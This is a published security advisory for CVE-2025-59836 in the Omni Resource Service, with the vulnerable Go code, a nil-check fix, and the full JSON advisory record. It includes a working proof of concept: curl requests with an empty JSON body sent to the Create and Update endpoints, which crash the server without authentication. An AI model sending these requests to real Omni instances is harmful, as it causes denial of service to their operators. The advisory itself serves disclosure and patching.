GHSA-4P3P-CR38-V5XP

Vulnerability from github – Published: 2025-10-13 19:59 – Updated: 2025-11-05 22:07
VLAI?
Summary
Omni is Vulnerable to DoS via Empty Create/Update Resource Requests
Details

Summary

A nil pointer dereference vulnerability in the Omni Resource Service allows unauthenticated users to cause a server panic and denial of service by sending empty create/update resource requests through the API endpoints.

Details

The vulnerability exists in the isSensitiveSpec function which calls grpcomni.CreateResource without checking if the resource's metadata field is nil. When a resource is created with an empty Metadata field, the CreateResource function attempts to access resource.Metadata.Version causing a segmentation fault.

Vulnerable Code

The isSensitiveSpec function in /src/internal/backend/server.go:

func isSensitiveSpec(resource *resapi.Resource) bool {
    res, err := grpcomni.CreateResource(resource)  // No nil check on resource.Metadata
    if err != nil {
        return false
    }
    // ... rest of function
}

The CreateResource function expects resource.Metadata to be non-nil:

func CreateResource(resource *resources.Resource) (cosiresource.Resource, error) {
    if resource.Metadata.Version == "" {  // PANIC: nil pointer dereference
        resource.Metadata.Version = "1"
    }
    // ... rest of function
}

The UpdateResource function has the same issue - it also calls CreateResource internally and expects resource.Metadata to be non-nil:

func (s *ResourceServer) Update(ctx context.Context, in *resapi.UpdateRequest) (*resapi.UpdateResponse, error) {
    // ... validation code ...
    obj, err := CreateResource(in.Resource)  // Same vulnerability here
    if err != nil {
        return nil, err
    }
    // ... rest of function
}

Affected Endpoints

  • resourceServerCreate - Create Resource API endpoint
  • resourceServerUpdate - Update Resource API endpoint

Both endpoints call isSensitiveSpec which triggers the vulnerability when processing empty resources.

PoC

Send empty resource requests to the affected API endpoints:

# Create endpoint
curl -X POST "https://your-omni-instance/api/omni.resources.ResourceService/Create" \
  -H "Content-Type: application/json" \
  -d '{}'

# Update endpoint  
curl -X POST "https://your-omni-instance/api/omni.resources.ResourceService/Update" \
  -H "Content-Type: application/json" \
  -d '{}'

Expected Result: Server panic with segmentation fault:

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0x293d970]

goroutine 3305 [running]:
github.com/siderolabs/omni/internal/backend/grpc.CreateResource(0x3495420?)
        /src/internal/backend/grpc/resource.go:364 +0x20

Impact

  • Vulnerability Type: Denial of Service (DoS)
  • Severity: High - Complete API server crash requiring manual restart if no restart policy is applied.
  • Authentication: None required (unauthenticated)
  • Complexity: Low (simple HTTP request)

Mitigation

Add nil checks in the isSensitiveSpec function:

func isSensitiveSpec(resource *resapi.Resource) bool {
    if resource == nil || resource.Metadata == nil {
        return false
    }
    res, err := grpcomni.CreateResource(resource)
    if err != nil {
        return false
    }
    // ... rest of function
}

Credits

  • @1c3t0rm
  • @nicomda
Severity ?
5.3 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.1.4"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siderolabs/omni"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.1.0-beta.0"
            },
            {
              "fixed": "1.1.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.1"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siderolabs/omni"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59836"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-13T19:59:17Z",
    "nvd_published_at": "2025-10-13T21:15:34Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nA nil pointer dereference vulnerability in the Omni Resource Service allows unauthenticated users to cause a server panic and denial of service by sending empty create/update resource requests through the API endpoints.\n\n## Details\n\nThe vulnerability exists in the `isSensitiveSpec` function which calls `grpcomni.CreateResource` without checking if the resource\u0027s metadata field is nil. When a resource is created with an empty `Metadata` field, the `CreateResource` function attempts to access `resource.Metadata.Version` causing a segmentation fault.\n\n### Vulnerable Code\n\nThe `isSensitiveSpec` function in `/src/internal/backend/server.go`:\n\n```go\nfunc isSensitiveSpec(resource *resapi.Resource) bool {\n    res, err := grpcomni.CreateResource(resource)  // No nil check on resource.Metadata\n    if err != nil {\n        return false\n    }\n    // ... rest of function\n}\n```\n\nThe `CreateResource` function expects `resource.Metadata` to be non-nil:\n\n```go\nfunc CreateResource(resource *resources.Resource) (cosiresource.Resource, error) {\n    if resource.Metadata.Version == \"\" {  // PANIC: nil pointer dereference\n        resource.Metadata.Version = \"1\"\n    }\n    // ... rest of function\n}\n```\n\nThe `UpdateResource` function has the same issue - it also calls `CreateResource` internally and expects `resource.Metadata` to be non-nil:\n\n```go\nfunc (s *ResourceServer) Update(ctx context.Context, in *resapi.UpdateRequest) (*resapi.UpdateResponse, error) {\n    // ... validation code ...\n    obj, err := CreateResource(in.Resource)  // Same vulnerability here\n    if err != nil {\n        return nil, err\n    }\n    // ... rest of function\n}\n```\n\n### Affected Endpoints\n\n- `resourceServerCreate` - Create Resource API endpoint\n- `resourceServerUpdate` - Update Resource API endpoint\n\nBoth endpoints call `isSensitiveSpec` which triggers the vulnerability when processing empty resources.\n\n## PoC\n\nSend empty resource requests to the affected API endpoints:\n\n```bash\n# Create endpoint\ncurl -X POST \"https://your-omni-instance/api/omni.resources.ResourceService/Create\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{}\u0027\n\n# Update endpoint  \ncurl -X POST \"https://your-omni-instance/api/omni.resources.ResourceService/Update\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{}\u0027\n```\n\n**Expected Result**: Server panic with segmentation fault:\n\n```\npanic: runtime error: invalid memory address or nil pointer dereference\n[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0x293d970]\n\ngoroutine 3305 [running]:\ngithub.com/siderolabs/omni/internal/backend/grpc.CreateResource(0x3495420?)\n        /src/internal/backend/grpc/resource.go:364 +0x20\n```\n\n## Impact\n\n- **Vulnerability Type**: Denial of Service (DoS)\n- **Severity**: High - Complete API server crash requiring manual restart if no restart policy is applied.\n- **Authentication**: None required (unauthenticated)\n- **Complexity**: Low (simple HTTP request)\n\n## Mitigation\n\nAdd nil checks in the `isSensitiveSpec` function:\n\n```go\nfunc isSensitiveSpec(resource *resapi.Resource) bool {\n    if resource == nil || resource.Metadata == nil {\n        return false\n    }\n    res, err := grpcomni.CreateResource(resource)\n    if err != nil {\n        return false\n    }\n    // ... rest of function\n}\n```\n\n## Credits\n- @1c3t0rm\n- @nicomda",
  "id": "GHSA-4p3p-cr38-v5xp",
  "modified": "2025-11-05T22:07:29Z",
  "published": "2025-10-13T19:59:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siderolabs/omni/security/advisories/GHSA-4p3p-cr38-v5xp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59836"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siderolabs/omni/commit/1396083f766a1b0380e9949968d7fc17b7afecaa"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siderolabs/omni/commit/1fd954af64985a8b3dbf5b11deddbf7cd953f5ae"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siderolabs/omni"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-4021"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Omni is Vulnerable to DoS via Empty Create/Update Resource Requests"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.